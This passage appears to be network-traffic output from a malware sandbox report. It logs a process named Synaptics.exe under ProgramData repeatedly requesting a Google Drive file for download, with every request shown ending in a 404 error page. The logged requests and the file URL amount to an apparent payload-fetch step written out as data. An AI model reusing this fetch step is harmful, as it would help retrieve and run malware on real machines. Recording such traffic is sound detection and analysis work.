                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:03 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:03 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 32 6c 6c 54 56 50 2d 4f 4f 7a 37 36 30 79 5a 4a 69 50 52 42 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="H2llTVP-OOz760yZJiPRBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:03 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            80192.168.2.950075172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:02 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:03 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:03 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-hkT3-CjNwElzwkN7PUKgMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            81192.168.2.950076216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:02 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:03 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4HC4BzbiNSYs7SCz_pLL2Y8vD4k-tKkJs7JlmH3G4dpsit9TRdPW27Hfl3Dowjkt3n
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:03 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-x_tBSapZ8I_qZRaXX4FKww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:03 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:03 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 34 52 39 51 4c 63 78 37 4a 79 4e 72 39 6f 36 33 66 47 76 54 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="64R9QLcx7JyNr9o63fGvTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:03 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            82192.168.2.950074172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:02 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:03 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:03 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ZXKRNd_WsyLLQCMY5CvNTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            83192.168.2.950083172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:03 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:04 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:04 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4vDz837TE-fyh4Mm9odDXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            84192.168.2.950085216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:03 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7DJkL_1k3p9Jm9qH6m00ifJonYXKMufLFJzyLhGnxw3s0cn8SmP-0OE54o9Lo-j9sw
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:04 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-A7lWMEU92VvuEHglevTTKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 79 67 57 78 66 67 74 41 57 6a 61 30 37 31 66 45 75 49 6b 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="JygWxfgtAWja071fEuIkLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            85192.168.2.950086172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:03 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:04 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:04 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Ut-Fk61ssX9qXl9QhNDzTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            86192.168.2.950089216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:04 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6HsKnWIfQvgEru7jQGgM419bNZ9E47e_kTVmr-mH-78XMyxclOxJymO9H7x6EFVgiE
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:04 GMT
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-k1w-qb6td-dd__bLLo89-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
